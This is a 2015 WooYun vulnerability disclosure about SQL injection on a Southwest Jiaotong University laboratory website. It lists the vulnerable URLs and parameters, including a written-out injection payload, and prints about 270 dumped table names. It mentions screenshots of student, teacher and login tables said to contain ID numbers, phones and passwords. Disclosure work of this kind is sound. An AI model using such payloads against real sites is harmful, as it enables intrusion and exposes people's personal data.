当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109207

漏洞标题:西南交通大学国家重点实验室SQL注入

相关厂商:西南交通大学

漏洞作者: harbour_bin

提交时间:2015-04-24 15:43

修复时间:2015-04-29 15:44

公开时间:2015-04-29 15:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

西南交通大学国家重点实验室多处SQL注入(可导致200多个表泄漏,以及身份证、邮箱、手机号、密码等信息泄漏)

详细说明:

西南交通大学国家重点实验室多处SQL注入

1、http://www.tplswjtu.com/WebSite1/detail.aspx?pnodenum=00291202&id=010
2、http://www.tplswjtu.com/website1/ShowPage.aspx?PnodeNum=002902%'%20and%20'%'='
第一个注入点:pnodenum和id
第二个注入点PnodeNum

漏洞证明:

1、注入证明

证明.png


2、可获得270个表,数据量较大

| 2011CGHJ                  |
| 2011FMZL                  |
| 2011FW                    |
| 2011HXKT                  |
| 2011LW                    |
| 2011RY                    |
| 2011SB                    |
| 2011SS                    |
| 2011XHJF                  |
| 2011XSHY                  |
| 2011XSRZ                  |
| 2011ZJJX                  |
| 2011ZXKT                  |
| 2011ZZKF                  |
| 2011ZZRS                  |
| 2012BS                    |
| 2012SB                    |
| 2013BS                    |
| 2013SS                    |
| AcceptPerson              |
| AddressManage             |
| AllLeaveManage            |
| AnnualReport              |
| AwardPerson               |
| AwardReport               |
| AwardReportPerson         |
| BackNote                  |
| BirthdaySend              |
| BookPerson                |
| BookReport                |
| BookReportPerson          |
| BuildManage               |
| CNASExpReport             |
| CNASExperiment            |
| CNASFixManage             |
| CNASGetExpNo              |
| CNASJionFix               |
| CNASStaChange             |
| CNASStandard              |
| CNAS_ChcekFacility        |
| CNAS_ChcekFacility_Tmp    |
| CNAS_ChcekLevel           |
| CNAS_ChcekParam           |
| CNAS_ChcekStandard        |
| CNAS_ChcekStandard_Tmp    |
| CNAS_CheckFac             |
| CNAS_CheckPlan            |
| CNAS_CheckPlanFac         |
| CNAS_CheckPlanFac_Tmp     |
| CNAS_CheckThing           |
| CNAS_ClientDiscontented   |
| CNAS_ClientIdea           |
| CNAS_ExpCheckMen          |
| CNAS_ExpCheckMen_Tmp      |
| CNAS_ExpReport            |
| CNAS_ExperimentBrief      |
| CNAS_ExperimentFac        |
| CNAS_ExperimentFac_Tmp    |
| CNAS_ExperimentPlan       |
| CNAS_ExperimentStu        |
| CNAS_ExperimentStu_Tmp    |
| CNAS_ExperimentTea        |
| CNAS_ExperimentTear_Tmp   |
| CNAS_FacilityAccept       |
| CNAS_FacilityInfo         |
| CNAS_FacilityPlan         |
| CNAS_FacilityRepair       |
| CNAS_FacilityRepairPlan   |
| CNAS_FacilityScrap        |
| CNAS_FileChange           |
| CNAS_FileDestroy          |
| CNAS_FileDownMen          |
| CNAS_FileEdit             |
| CNAS_FileManage           |
| CNAS_InExamNoReport       |
| CNAS_InExamNoWork         |
| CNAS_InExamPlan           |
| CNAS_InExamReport         |
| CNAS_InExamResult         |
| CNAS_ManagePlan           |
| CNAS_ManageReport         |
| CNAS_NewCheckObject       |
| CNAS_NewCheckObjectReport |
| CNAS_NoWork               |
| CNAS_NoWorkBack           |
| CNAS_Person               |
| CNAS_PowerCheck           |
| CNAS_PowerOver            |
| CNAS_QJCheckFac           |
| CNAS_ReportBack           |
| CNAS_SendUnit             |
| CNAS_Soft                 |
| CNAS_StaChange            |
| CNAS_Standard             |
| CNAS_TogetherUnit         |
| CNAS_Train                |
| CNAS_TrainPerson          |
| CNAS_TrainPerson_Tmp      |
| CNAS_TrainPlan            |
| CarApply                  |
| CarInfo                   |
| CarMaintain               |
| ChangeStuInfo             |
| CheapAway                 |
| CheapBack                 |
| CheapFix                  |
| CheapFixBasic             |
| ClassInfo                 |
| ContactApply              |
| ContactDatum              |
| ContactPerson             |
| ContactPlan               |
| ContactReceive            |
| D99_CMD                   |
| D99_Tmp                   |
| DataType                  |
| Discourse                 |
| DiscoursePerson           |
| DiscourseReport           |
| DiscourseReportPerson     |
| DoorCardRecord            |
| DownLoad                  |
| English_Person            |
| English_ResearchGroup     |
| English_SlideImages       |
| EnterStu_1                |
| EnterStu_2                |
| ExcelFix                  |
| ExpertChair               |
| ExternalExperts           |
| FamillyPerson             |
| FieldInfo                 |
| FitmentChange             |
| FitmentManage             |
| FixApplyMoney             |
| FixBuyApply               |
| FixChange                 |
| FixManage                 |
| FixOrder                  |
| FixPlan                   |
| FixRepair                 |
| FixRepairApply            |
| FixScrap                  |
| FixUsedManage             |
| ForbidSendNode            |
| FrameWork                 |
| FrameWorkOrder            |
| FrindLinkA                |
| FrindLinkB                |
| GJObject                  |
| GJObjectMoney             |
| GJObjectPerson            |
| GjHZObject                |
| HXObject                  |
| HXObjectMoney             |
| HXObjectPerson            |
| HeadshipInfo              |
| IfUserApplyInfo           |
| InNews                    |
| InfoShow                  |
| JobResume                 |
| JournalshipInfo           |
| JudgePerson               |
| KFApplyMoney              |
| KFBudgetMoney             |
| KFObject                  |
| MainMeet                  |
| MainObject                |
| MeetApply                 |
| MeetRoom                  |
| MsgIdCard                 |
| MyFrameWork               |
| MyFrameWorkStep           |
| MyView                    |
| MyWorkMSG                 |
| OFT_OfficeTestBrief       |
| OFT_OfficeTestFac         |
| OFT_OfficeTestFac_Tmp     |
| OFT_OfficeTestPerson      |
| OFT_OfficeTestPerson_Tmp  |
| OFT_OfficeTestPlan        |
| OFT_OfficeTestReport      |
| ObjectForeign             |
| OfficeFix                 |
| OfficeFixChange           |
| OnStadyInfo               |
| PageLinks                 |
| PatentPerson              |
| PatentReport              |
| PatentReportPerson        |
| PayMoneyOrder             |
| PersonAward               |
| PersonBook                |
| PersonDiscourse           |
| PersonJudge               |
| PersonLearn               |
| PersonMeet                |
| PersonPatent              |
| PersonPrize               |
| PictureM                  |
| PlayUserActionInfo        |
| PutPayMoney               |
| ReportConfig              |
| RoomManage                |
| S3_Tmp                    |
| ScholarVister             |
| ScienceCBW                |
| ScienceHJ                 |
| ScienceObject             |
| ScienceRY                 |
| ScienceZL                 |
| SendAllAddress            |
| SendAllNote               |
| SendNoteNum               |
| SendRemindNote            |
| SmallNote                 |
| SpeGradeInfo              |
| SpeType                   |
| SpecialtyInfo             |
| StuAward                  |
| StuDataChange             |
| StuDiscourse              |
| StuPatent                 |
| StudentInfo               |
| Sys_Part                  |
| Sys_PartLogin             |
| Sys_Popedom               |
| Sys_PowerNode             |
| TableInfo                 |
| TableRelation             |
| TeachInfo                 |
| TeacherLeave              |
| TempPerson                |
| TmpCNASJionFix            |
| TmpContactDatum           |
| TmpContactPerson          |
| TmpContactPlan            |
| TmpContactReceive         |
| TmpJionPerson             |
| TmpObjectPerson           |
| UserFinishYear            |
| UserLogin                 |
| V_Object                  |
| V_ObjectPerson            |
| V_UserLogin               |
| Vas_Blacklist             |
| Web_News                  |
| WordMessege               |
| WorkSeatManage            |
| XSRZScience               |
| YJPerson                  |
| YSPerson                  |
| ZL_DataInfo               |
| ZL_LendOrBack             |
| ZL_Type                   |
| ZXObject                  |
| ZXObjectApply             |
| ZXObjectMoney             |
| ZXObjectPerson            |
| ZXObjectReport            |
| ZZApplyMoney              |
| ZZBudgetMoney             |
| ZZObject                  |
| dtproperties              |
| pbcatcol                  |
| pbcatedt                  |
| pbcatfmt                  |
| pbcattbl                  |
| pbcatvld                  |
| sqlmapoutput              |


3、部分表的数据挖掘

StudentInfo.png


TeachInfo.png


UserLogin.png


修复方案:

你们更专业

版权声明:转载请注明来源 harbour_bin@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-29 15:44

厂商回复:

最新状态:

暂无

漏洞评价:

评论